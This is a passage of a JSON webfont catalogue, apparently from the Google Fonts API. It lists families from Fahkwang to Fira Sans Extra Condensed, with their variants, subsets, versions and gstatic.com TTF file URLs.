\"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgHFQHC5Tlhjxdw4.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOIjmplRFipxkwjx.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgBVTHC5Tlhjxdw4.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noax6Uj3zpmBOgbNpNqPsr1ZPTZ4.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa36Uj3zpmBOgbNpOqNuLl7OCZ4ihE.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJ7m5lRFipxkwjx.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgE1SHC5Tlhjxdw4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOJXnJlRFipxkwjx.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgGFVHC5Tlhjxdw4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa26Uj3zpmBOgbNpOIznZlRFipxkwjx.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/fahkwang/v16/Noa06Uj3zpmBOgbNpOqNgAVUHC5Tlhjxdw4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Familjen Grotesk\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMGJaSztc1jcEYq2.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMG7aSztc1jcEYq2.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMFXbiztc1jcEYq2.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw3LZR9ZHiDnImG6-NEMQ41wby8WRnYsfkunR_eGfMFubiztc1jcEYq2.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKsSueVz-FJq2Rv4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKvaueVz-FJq2Rv4.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKhqpeVz-FJq2Rv4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/familjengrotesk/v4/Qw31ZR9ZHiDnImG6-NEMQ41wby8WbH8egZPOLG0oe9RBKiOpeVz-FJq2Rv4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fanwood Text\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fanwoodtext/v15/3XFtErwl05Ad_vSCF6Fq7xXGRdbY1P1Sbg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/fanwoodtext/v15/3XFzErwl05Ad_vSCF6Fq7xX2R9zc9vhCblye.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Farro\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa3hNJ6-WkJUQUq7.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/farro/v14/i7dEIFl3byGNHZVNHLq2cV5d.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa25NZ6-WkJUQUq7.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/farro/v14/i7dJIFl3byGNHa3xM56-WkJUQUq7.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Farsan\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/farsan/v18/VEMwRoJ0vY_zsyz62q-pxDX9rQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fascinate\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fascinate/v21/z7NWdRrufC8XJK0IIEli1LbQRPyNrw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fascinate Inline\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fascinateinline/v22/jVyR7mzzB3zc-jp6QCAu60poNqIy1g3CfRXxWZQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Faster One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fasterone/v17/H4ciBXCHmdfClFb-vWhfyLuShq63czE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fasthand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fasthand/v26/0yb9GDohyKTYn_ZEESkuYkw2rQg1.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fauna One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/faunaone/v13/wlpzgwTPBVpjpCuwkuEx2UxLYClOCg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Faustina\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHls3IEvGVWWe8tbEg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsgoEvGVWWe8tbEg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlssIEvGVWWe8tbEg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsXIYvGVWWe8tbEg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsZYYvGVWWe8tbEg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/faustina/v16/XLY4IZPxYpJfTbZAFXWzNT2SO8wpWHlsAoYvGVWWe8tbEg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsKZWl-SWc5LEnoF.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsLHWl-SWc5LEnoF.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsL1Wl-SWc5LEnoF.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIZXV-SWc5LEnoF.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsIgXV-SWc5LEnoF.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/faustina/v16/XLY2IZPxYpJfTbZAFV-6B8JKUqez9n55SsJHXV-SWc5LEnoF.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Federant\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/federant/v25/2sDdZGNfip_eirT0_U0jRUG0AqUc.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Federo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/federo/v19/iJWFBX-cbD_ETsbmjVOe2WTG7Q.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Felipa\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/felipa/v19/FwZa7-owz1Eu4F_wSNSEwM2zpA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fenix\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fenix/v20/XoHo2YL_S7-g5ostKzAFvs8o.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Festive\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/festive/v7/cY9Ffj6KX1xcoDWhFtfgy9HTkak.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Figtree\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_chQF5ewkEU4HTy.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_d_QF5ewkEU4HTy.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_dNQF5ewkEU4HTy.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_ehR15ewkEU4HTy.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_eYR15ewkEU4HTy.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_f_R15ewkEU4HTy.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/figtree/v2/_Xmz-HUzqDCFdgfMsYiV_F7wfS-Bs_fWR15ewkEU4HTy.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3A-gdyEU25WTybO8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3A7YdyEU25WTybO8.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3A4QdyEU25WTybO8.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3A2gayEU25WTybO8.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3A1EayEU25WTybO8.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3AzYayEU25WTybO8.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/figtree/v2/_Xm9-HUzqDCFdgfMm4GnA4aZFrUvtOK3Ax8ayEU25WTybO8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Finger Paint\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/fingerpaint/v15/0QInMXVJ-o-oRn_7dron8YWO85bS8ANesw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Finlandica\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19A7rEjx9i5ss3a3.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19AJrEjx9i5ss3a3.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19Dlq0jx9i5ss3a3.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFsOGk-8vAc7lEtg0aSyZCty9GSsPBE19Dcq0jx9i5ss3a3.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz76Cy_CpOtma3uNQ.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz75Ky_CpOtma3uNQ.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz7361_CpOtma3uNQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/finlandica/v5/-nFuOGk-8vAc7lEtg0aS45mfNAn722rq0MXz70e1_CpOtma3uNQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fira Code\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_GNsFVfxN87gsj0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_D1sFVfxN87gsj0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_A9sFVfxN87gsj0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_ONrFVfxN87gsj0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/firacode/v21/uU9eCBsR6Z2vfE9aq3bL0fxyUs4tcw4W_NprFVfxN87gsj0.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fira Mono\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/firamono/v14/N0bX2SlFPv1weGeLZDtQIfTTkdbJYA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/firamono/v14/N0bS2SlFPv1weGeLZDto1d33mf3VaZBRBQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/firamono/v14/N0bS2SlFPv1weGeLZDtondv3mf3VaZBRBQ.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fira Sans\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/firasans/v16/va9C4kDNxMZdWfMOD5Vn9IjOazP3dUTP.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9A4kDNxMZdWfMOD5VvkrCqYTfVcFTPj0s.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnWKnuQR37fF3Wlg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrAGQBf_XljGllLX.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnPKruQR37fF3Wlg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBiQxf_XljGllLX.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/firasans/v16/va9E4kDNxMZdWfMOD5VfkILKSTbndQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9C4kDNxMZdWfMOD5VvkojOazP3dUTP.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnZKvuQR37fF3Wlg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrA6Qhf_XljGllLX.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnSKzuQR37fF3Wlg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrAWRRf_XljGllLX.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnLK3uQR37fF3Wlg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrByRBf_XljGllLX.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnMK7uQR37fF3Wlg.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBuRxf_XljGllLX.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/firasans/v16/va9B4kDNxMZdWfMOD5VnFK_uQR37fF3Wlg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/firasans/v16/va9f4kDNxMZdWfMOD5VvkrBKRhf_XljGllLX.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fira Sans Condensed\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOjEADFm8hSaQTFG18FErVhsC9x-tarWZXtqOlQfx9CjA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOtEADFm8hSaQTFG18FErVhsC9x-tarUfPVzONUXRpSjJcu.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWTnMiMN-cxZblY4.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVYMJ0dzRehY43EA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWV3PiMN-cxZblY4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVBMF0dzRehY43EA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOhEADFm8hSaQTFG18FErVhsC9x-tarYfHnrMtVbx8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOjEADFm8hSaQTFG18FErVhsC9x-tarUfPtqOlQfx9CjA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWQXOiMN-cxZblY4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVXMB0dzRehY43EA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWSnJiMN-cxZblY4.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVcMd0dzRehY43EA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWU3IiMN-cxZblY4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVFMZ0dzRehY43EA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWVHLiMN-cxZblY4.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVCMV0dzRehY43EA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOsEADFm8hSaQTFG18FErVhsC9x-tarWXXKiMN-cxZblY4.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/firasanscondensed/v10/wEOuEADFm8hSaQTFG18FErVhsC9x-tarUfPVLMR0dzRehY43EA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Fira Sans Extra Condensed\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPMcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3Zyuv1WarE9ncg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPOcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqW21-ejkp3cn22.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3TCPn3-0oEZ-a2Q.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWd36-pGR7e2SvJQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPPcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda3VSMn3-0oEZ-a2Q.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPxcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda1fqWE32-pGR7e2SvJQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/firasansextracondensed/v10/NaPKcYDaAO5dirw6IaFn7lPJFqXmS-M9Atn3wgda5fiku3efvE8.ttf\",\n        \"italic\": 